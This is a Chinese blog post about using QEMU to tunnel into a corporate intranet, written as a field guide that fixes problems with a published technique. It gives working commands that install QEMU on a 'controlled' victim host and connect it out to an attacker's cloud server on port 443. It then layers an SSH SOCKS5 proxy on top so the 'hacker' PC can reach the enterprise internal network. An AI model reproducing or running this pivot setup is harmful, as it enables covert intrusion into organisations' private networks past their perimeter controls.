实战中使用 QEMU 进行内网穿透

已于 2024-05-11 13:22:44 修改
阅读量1k 收藏 8
点赞数 20
分类专栏: 安全 文章标签: 安全
于 2024-05-11 13:17:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/138670767
版权

前言

阅读
https://xz.aliyun.com/t/14052 《使用 QEMU 进行内网穿透?》
https://securelist.com/network-tunneling-with-qemu/111803/ 《Network tunneling with… QEMU?》
我将此项技术应用到实战中,取得不错的效果,但是也遇到很多坑,此篇文章也是一篇排坑的文章

原文章

下面是原文章的拓扑图
请添加图片描述

坑一

原文章中,使用linux 服务器启动qemu 服务端,并且在上面启动监听端口,但是在实际使用中,需要在云上或者vps上搭建服务器环境,云上提供的linux主机一般都没有desk环境,所以qemu在启动的时候会常常报 gtk initialization failed 虽然在启动qemu时加上 --nographic 就可以正常启动,但是linux 终端就会陷入全黑的状态,连光标都消失了。

解决方法

在云上购买windows主机,我买的主机是 Windows Server 2019 数据中心版 64位 中文版
然后根据qemu 官方文档(https://www.qemu.org/download/ ),需要下载和安装 MSYS2 下载地址:https://github.com/msys2/msys2-installer/releases/download/2024-05-07/msys2-x86_64-20240507.exe

安装好之后在UCRT64中执行下面的命令:

pacman -S mingw-w64-ucrt-x86_64-qemu

就安装好qeme了,之后下载 kali-linux-2023.4-live-amd64.iso 放在 C:\msys64\home\Administrator 目录下

坑二

原文章使用的拓扑中,服务器启动的qemu只使用一张网卡,被控主机反连此网卡走的所有流量都是被控主机的流量,并且由于在云主机上启动qemu,云主机上默认不开kvm,所以启动的qemu不能使用 enable-kvm 加速虚拟机,所以导致启动的虚拟机会特别卡顿,卡顿到无法流畅使用的地步。

解决方法

需要修改原文的拓扑
请添加图片描述
上图最关键的是在云主机里面的qemu里面设置双网卡,并且这两个网卡的mac地址要设置为不同的mac地址,不然就会出现mac地址冲突,造成只有一个网卡能正常使用的情况。要给qemu设置双网卡,参考 https://blog.csdn.net/pawpaw77/article/details/130793008 。

  1. 首先要给windows 服务器安装虚拟网卡 先下载tap-window6(https://github.com/OpenVPN/tap-windows6/releases/download/9.26.0/dist.win7.zip) 之后cmd进入AMD64目录(64位系统),执行命令tapinstall install OemVista.inf tap0901,然后Win+R 运行 hdwwiz,添加网络适配器。最后把新建的网卡命名为 tap0。最后给新创建的网卡设置ip地址为192.168.137.1 掩码为255.255.255.0。https://blog.csdn.net/pawpaw77/article/details/130793008 这个文章中在后续需要创建网桥,本人经过多次实验之后,发现完全不需要在windows主机上搭建网桥。
    在这里插入图片描述

  2. 使用如下命令创建qemu虚拟机:

qemu-system-x86_64 -boot d -cdrom kali-linux-2023.4-live-amd64.iso -accel tcg -m 24576 -netdev tap,id=tapnet,ifname=tap0,script=no -device e1000,netdev=tapnet,mac=52:54:00:12:34:57 -device e1000,netdev=n1,mac=52:54:00:12:34:56 -smp 4 -netdev socket,id=n1,listen=:443   // 解决网卡是同mac地址问题 ok

创建好之后,进入qemu虚拟机后配置,

ifconfig eth0 192.168.137.2 netmask 255.255.255.0
  1. 在被控主机上执行如下指令就可以让被控主机和云上的qemu服务器组成一个私有局域网,当被控主机qemu连接到云上的qemu服务器后qume服务器上另一张网卡上就会自动被分配一个ip地址。这样云上的qemu虚拟机就可以无限制的访问到企业内网:
apt update
apt-get install -y qemu-system
qemu-system-x86_64 -m 1M -netdev user,id=lan,restrict=off -netdev socket,id=sock,connect=1.1.1.1:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic

注意,这个命令只能在ubuntu上执行,我尝试在centos上执行,失败了,我在项目中没有那么多时间去研究到底是怎么回事,未来有时间再继续研究一下。
4. 在windows 使用 ssh -D 0.0.0.0:1080 root@192.168.137.2 搭建一条连接到qemu的socks5的代理通道,ssh 监听到0.0.0.0 就可以让hacker主机直接使用windows 主机作为跳板连接到企业内网
5. 黑客在自己的pc机器上做如下设置,就可以直接连接到企业内网了请添加图片描述

niexinming
关注
  • 20
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
linux qemu使用教程,详解QEMU网络配置的方法
weixin_36150816的博客
05-03 1842
今天给大家介绍一下QEMU网络配置的方法。qemu两种上网方式:user mode network :这种方式实现虚拟机上网很简单,类似vmware里的nat,qemu启动时加入-user-net参数,虚拟机里使用dhcp方式,即可与互联网通信,但是这种方式虚拟机与主机的通信不方便。tap/tun network :这种方式要比user mode复杂一些,但是设置好后 虚拟机互联网 虚拟机主机 通...
Qemu使用手册
09-25
Qemu使用手册
如何使用 QEMU 的虚拟串口
st780206的专栏
01-05 8599
如何使用QEMU的虚拟串口[转]_yanglin_新浪博客如何使用QEMU的虚拟串口[转]_yanglin_新浪博客,yanglin,http://blog.sina.com.cn/s/blog_a1e6528101019xmm.html QEMU 具有模拟串口和并口的能力, 在 QEMU 的命令行接口, 提供了 -serial 参数供用户设置把虚拟的串口重定向到哪里. 本文档主要介绍如何使用这个虚拟串口, 接下来会从代码方面描述 QEMU 如何模拟 一个串口. 不使用串口 $...
QEMU入门指南
热门推荐
FontTian的博客
02-03 6万+
QEMU 本文分为三个部分,第一部分主要介绍了qemu是什么,给人一个基本印象。第二部分重点介绍其安装。第三部分介绍其架构,这对我们的进一步使用有比较大的好处。 什么是QEMU QEMU是一种通用的开源计算机仿真器和虚拟器。QEMU共有两种操作模式 全系统仿真:能够在任意支持的架构上为任何机器运行一个完整的操作系统 用户模式仿真:能够在任意支持的架构上为另一个Linux/BSD运行程序 ...
使用 QEMU 进行系统仿真
d202x的博客
07-07 1819
使用 QEMU 进行系统仿真
使用QEMU(x86)模拟运行ARM64架构并进行内核调试
Jia ming 的日常学习笔记
04-06 4688
详细描述了如何从头构建一个QEMU(x86)+ARM64平台环境,并进行内核调试过程。
ubuntu虚拟机使用QEMU搭建ARM64环境
兰钧的博客
04-05 9057
本文记录了在ubuntu20.04上,使用QEMU搭建arm64 的开发环境。
0.使用Qemu运行OP-TEE
shuaifengyun的专栏
05-09 2万+
历经一年多时间的系统整理合补充,《手机安全和可信应用开发指南:TrustZone与OP-TEE技术详解》一书得以出版,书详细介绍了TEE以及系统安全的所有内容,全书按照从硬件到软件,从用户空间到内核空间的顺序对TEE技术详细阐述,读者可从用户空间到TEE内核一步一步了解系统安全的所有内容,同时书也提供了相关的示例代码,读者可根据自身实际需求开发TA。目前该书已在天猫、京东、当当同步...
使用qemu进行路由器环境的虚拟搭建
底层社会中的弱智
06-27 4309
跟着墨鱼实验室的大佬学习复现 参考原文:https://mp.weixin.qq.com/s/ew9SY8SMDvtMptF6k1TKdw 本次针对的路由器固件是华为路由器 下载地址 链接:https://pan.baidu.com/s/1soGEzvU1dBHau-r0WTFaNQ 提取码:0000 使用binwalk提取文件系统 binwalk –Vme HG532eV100R001C01B020_upgrade_packet.bin 出现了报错,查看下报错内容: 是缺少sasqu
使用qemu模拟CXL.mem设备
最新发布
winux的专栏
05-27 2605
CXL可以说是自PCIe技术诞生几十年以来最具变革性的新技术了。可以想象有了CXL以后机箱的边界将被彻底打破,服务器互相使用对方的内存,网卡,GPU。整个机架甚至跨机架的超级资源池化成为可能,云计算也将进入一个新的时代。当前Intel, AMD 目前最新CPU型号也都已经支持CXL接口,三星也有支持CXL的内存模组提供,但是普及性还是非常低,可能只有极个别的研究人员才能拿到真正的物理设备。作为不那么有实力的普通IT从业者如何才能体验这一最前沿的科技成果呢?使用模拟器便是最方便的选择。
dma.rar_qemu dma_qemu的DMA
09-23
QEMU DMA emulation for Linux.
Qemu使用手册文版
06-07
Qemu使用手册文版,安装以及使用详细教程,命令详解
go-qemu:使用QEMU机器协议(QMP)进行打包以与QEMU进行交互。 Apache 2.0许可
05-03
go-qemu是Go软件包的集合,用于与正在运行的QEMU实例进行交互。 Apache 2.0许可。 如果您想讨论该项目, 随时加入我们在 。 安装 使用go get检索go-qemu所有软件包: $ go get github....
XP下使用QEMU虚拟机实战
01-17
XP下使用QEMU虚拟机实战 PDF格式 详细说明
使用ysoserial生成反序列化文件
一个码农的笔记
06-01 2万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
jar重新打包
一个码农的笔记
05-05 2万+
首先
破解md5的python代码,持续更新
一个码农的笔记
09-22 1万+
# -*- coding: utf-8 -*- import string import hashlib file=open("hello.txt","a") md5input=raw_input("请输入md5:\n") md5input=md5input.lower() apt=string.printable[:-6] def dfs(s,num): m=hashlib.md5()
简单的方式挖掘和利用soap的sql注入
一个码农的笔记
10-29 1万+
1.首先soap是什么: 对于应用程序开发来说,使程序之间进行因特网通信是很重要的。目前的应用程序通过使用远程过程调用(RPC)在诸如 DCOM 与 CORBA 等对象之间进行通信,但是 HTTP 不是为此设计的。RPC 会产生兼容性以及安全问题;防火墙和代理服务器通常会阻止此类流量。通过 HTTP 在应用程序间通信是更好的方法,因为 HTTP 得到了所有的因特网浏览器及服务器的支持。SOAP 
能找一个qemu使用教程吗
05-12
当然可以,以下是QEMU使用教程: QEMU是一款开源的虚拟机软件,可以模拟多个不同的硬件平台,并且可以运行各种操作系统。下面是QEMU使用方法: 1. 安装QEMU 首先需要安装QEMU软件,可以在官网下载对应的安装包进行安装。也可以使用包管理器进行安装,比如在Ubuntu系统可以使用以下命令进行安装: ``` sudo apt-get install qemu ``` 2. 创建虚拟机 在QEMU,可以使用命令行参数来指定虚拟机的参数,例如: ``` qemu-system-x86_64 -hda disk.img -cdrom ubuntu.iso -boot d ``` 其`-hda disk.img`表示使用`disk.img`作为虚拟机的硬盘,`-cdrom ubuntu.iso`表示使用`ubuntu.iso`作为虚拟机的光驱,`-boot d`表示从光驱启动。 3. 运行虚拟机 使用以上命令可以启动虚拟机,如果需要在图形界面运行虚拟机,可以添加`-display sdl`参数,例如: ``` qemu-system-x86_64 -hda disk.img -cdrom ubuntu.iso -boot d -display sdl ``` 4. 进入虚拟机 当虚拟机启动后,可以使用VNC客户端连接到虚拟机,也可以使用`-nographic`参数在命令行进入虚拟机,例如: ``` qemu-system-x86_64 -hda disk.img -cdrom ubuntu.iso -boot d -nographic ``` 这样就可以在命令行进入虚拟机,使用操作系统。 以上就是QEMU使用教程,希望对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值